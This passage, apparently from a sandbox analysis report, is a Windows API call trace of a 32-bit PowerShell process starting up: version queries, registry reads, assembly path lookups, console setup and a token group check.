lpString1=0x3953b0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0088.019] VerQueryValueW (in: pBlock=0x2bdab78, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x13e904, puLen=0x13e900 | out: lplpBuffer=0x13e904*=0x2bdafc4, puLen=0x13e900) returned 1 [0088.019] lstrlenW (lpString="6.1.7601.17514") returned 14 [0088.019] lstrcpyW (in: lpString1=0x3953b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0088.019] VerQueryValueW (in: pBlock=0x2bdab78, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x13e904, puLen=0x13e900 | out: lplpBuffer=0x13e904*=0x2bdac6c, puLen=0x13e900) returned 1 [0088.019] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0088.019] lstrcpyW (in: lpString1=0x3953b0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0088.019] VerQueryValueW (in: pBlock=0x2bdab78, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x13e904, puLen=0x13e900 | out: lplpBuffer=0x13e904*=0x0, puLen=0x13e900) returned 0 [0088.019] VerQueryValueW (in: pBlock=0x2bdab78, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x13e904, puLen=0x13e900 | out: lplpBuffer=0x13e904*=0x0, puLen=0x13e900) returned 0 [0088.019] VerQueryValueW (in: pBlock=0x2bdab78, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x13e904, puLen=0x13e900 | out: lplpBuffer=0x13e904*=0x0, puLen=0x13e900) returned 0 [0088.019] VerQueryValueW (in: pBlock=0x2bdab78, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x13e8f8, puLen=0x13e8f4 | out: lplpBuffer=0x13e8f8*=0x2bdac14, puLen=0x13e8f4) returned 1 [0088.019] VerLanguageNameW (in: wLang=0x0, szLang=0x3953b0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0088.019] VerQueryValueW (in: pBlock=0x2bdab78, lpSubBlock="\\", lplpBuffer=0x13e90c, puLen=0x13e908 | out: lplpBuffer=0x13e90c*=0x2bdaba0, puLen=0x13e908) returned 1 [0088.024] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0088.024] GetLastError () returned 0xcb [0088.027] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0088.027] GetLastError () returned 0xcb [0088.030] lstrlenW (lpString="䅁") returned 1 [0088.032] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e8d0 | out: phkResult=0x13e8d0*=0x324) returned 0x0 [0088.032] RegOpenKeyExW (in: hKey=0x324, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e8d4 | out: phkResult=0x13e8d4*=0x328) returned 0x0 [0088.032] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e908 | out: phkResult=0x13e908*=0x32c) returned 0x0 [0088.034] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e948, lpData=0x0, lpcbData=0x13e944*=0x0 | out: lpType=0x13e948*=0x1, lpData=0x0, lpcbData=0x13e944*=0x56) returned 0x0 [0088.035] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e948, lpData=0x3953b0, lpcbData=0x13e944*=0x56 | out: lpType=0x13e948*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x13e944*=0x56) returned 0x0 [0088.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0088.037] GetLastError () returned 0x0 [0088.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0088.039] GetLastError () returned 0x0 [0088.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0088.043] GetLastError () returned 0x0 [0088.053] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0088.053] GetLastError () returned 0xcb [0088.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x13e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0088.248] GetLastError () returned 0x2 [0088.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x13e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0088.248] GetLastError () returned 0x2 [0088.311] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0088.311] GetLastError () returned 0xcb [0088.312] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0088.312] GetLastError () returned 0xcb [0088.326] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0088.326] GetLastError () returned 0xcb [0088.327] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0088.327] GetLastError () returned 0xcb [0088.327] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0088.327] GetLastError () returned 0xcb [0088.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x13e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0088.431] GetLastError () returned 0x0 [0088.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x13e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0088.431] GetLastError () returned 0x0 [0088.437] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0088.437] GetLastError () returned 0xcb [0088.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0088.438] GetLastError () returned 0xcb [0088.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0088.469] GetLastError () returned 0x7e [0088.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0088.469] GetLastError () returned 0x7e [0088.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x13e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0088.714] GetLastError () returned 0x2 [0088.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x13e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0088.714] GetLastError () returned 0x2 [0088.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0088.753] GetLastError () returned 0x57 [0088.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0088.753] GetLastError () returned 0x57 [0088.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x13e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0088.820] GetLastError () returned 0x2 [0088.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x13e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0088.820] GetLastError () returned 0x2 [0088.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x13e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0088.864] GetLastError () returned 0x2 [0088.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x13e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0088.864] GetLastError () returned 0x2 [0088.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0088.892] GetLastError () returned 0xcb [0088.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0088.892] GetLastError () returned 0xcb [0088.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e488, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0088.893] GetLastError () returned 0xcb [0088.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e488, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0088.893] GetLastError () returned 0xcb [0088.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e488, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0088.898] GetLastError () returned 0xcb [0088.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x13e41c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0088.926] GetLastError () returned 0x2 [0088.926] SetErrorMode (uMode=0x1) returned 0x1 [0088.926] GetFileAttributesExW (in: lpFileName="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x13e8c4 | out: lpFileInformation=0x13e8c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0088.926] GetLastError () returned 0x2 [0088.926] SetErrorMode (uMode=0x1) returned 0x1 [0089.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.013] GetLastError () returned 0x0 [0089.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e488, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.013] GetLastError () returned 0x0 [0089.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e488, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.014] GetLastError () returned 0x0 [0089.016] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.016] GetLastError () returned 0xcb [0089.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.018] GetLastError () returned 0xcb [0089.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.018] GetLastError () returned 0xcb [0089.020] CoCreateGuid (in: pguid=0x13e9a4 | out: pguid=0x13e9a4*(Data1=0x2946bf3, Data2=0x7a02, Data3=0x4c29, Data4=([0]=0x93, [1]=0x2b, [2]=0x0, [3]=0x7d, [4]=0xf7, [5]=0xd6, [6]=0x42, [7]=0x19))) returned 0x0 [0089.023] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.023] GetLastError () returned 0xcb [0089.024] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.024] GetLastError () returned 0xcb [0089.025] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.025] GetLastError () returned 0xcb [0089.031] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0089.031] GetLastError () returned 0x0 [0089.032] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x13e884 | out: lpConsoleScreenBufferInfo=0x13e884) returned 1 [0089.032] GetLastError () returned 0x0 [0089.035] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0089.035] GetLastError () returned 0x0 [0089.035] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x13e884 | out: lpConsoleScreenBufferInfo=0x13e884) returned 1 [0089.035] GetLastError () returned 0x0 [0089.036] GetVersionExW (in: lpVersionInformation=0x3953c8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3953c8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.036] GetLastError () returned 0x0 [0089.037] GetCurrentProcess () returned 0xffffffff [0089.037] GetLastError () returned 0x3f0 [0089.037] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13e894 | out: TokenHandle=0x13e894*=0x348) returned 1 [0089.037] GetLastError () returned 0x3f0 [0089.041] GetTokenInformation (in: TokenHandle=0x348, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x13e8ec | out: TokenInformation=0x0, ReturnLength=0x13e8ec) returned 0 [0089.041] GetLastError () returned 0x7a [0089.042] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x39b528 [0089.042] GetLastError () returned 0x7a [0089.042] GetTokenInformation (in: TokenHandle=0x348, TokenInformationClass=0x8, TokenInformation=0x39b528, TokenInformationLength=0x4, ReturnLength=0x13e8ec | out: TokenInformation=0x39b528, ReturnLength=0x13e8ec) returned 1 [0089.042] GetLastError () returned 0x7a [0089.043] DuplicateTokenEx (in: hExistingToken=0x348, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x13e8a4 | out: phNewToken=0x13e8a4*=0x340) returned 1 [0089.043] GetLastError () returned 0x7f [0089.043] GetTokenInformation (in: TokenHandle=0x348, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x13e8ec | out: TokenInformation=0x0, ReturnLength=0x13e8ec) returned 0 [0089.043] GetLastError () returned 0x7a [0089.043] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x39b508 [0089.043] GetLastError () returned 0x7a [0089.043] GetTokenInformation (in: TokenHandle=0x348, TokenInformationClass=0x8, TokenInformation=0x39b508, TokenInformationLength=0x4, ReturnLength=0x13e8ec | out: TokenInformation=0x39b508, ReturnLength=0x13e8ec) returned 1 [0089.043] GetLastError () returned 0x7a [0089.044] CheckTokenMembership (in: TokenHandle=0x340, SidToCheck=0x2c5d9ec*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x13e880 | out: IsMember=0x13e880) returned 1 [0089.044] GetLastError () returned 0x7a [0089.044] CloseHandle (hObject=0x340) returned 1 [0089.044] GetLastError () returned 0x7a [0089.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e3c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.044] GetLastError () returned 0x7a [0089.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e374, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.044] GetLastError () returned 0x7a [0089.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e374, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.045] GetLastError () returned 0x7a [0089.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e374, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.045] GetLastError () returned 0x7a [0089.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e3c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.057] GetLastError () returned 0x7a [0089.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e374, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.057] GetLastError () returned 0x7a [0089.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e374, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.057] GetLastError () returned 0x7a [0089.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e3c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.057] GetLastError () returned 0x7a [0089.057] GetFullPathNameW (in: 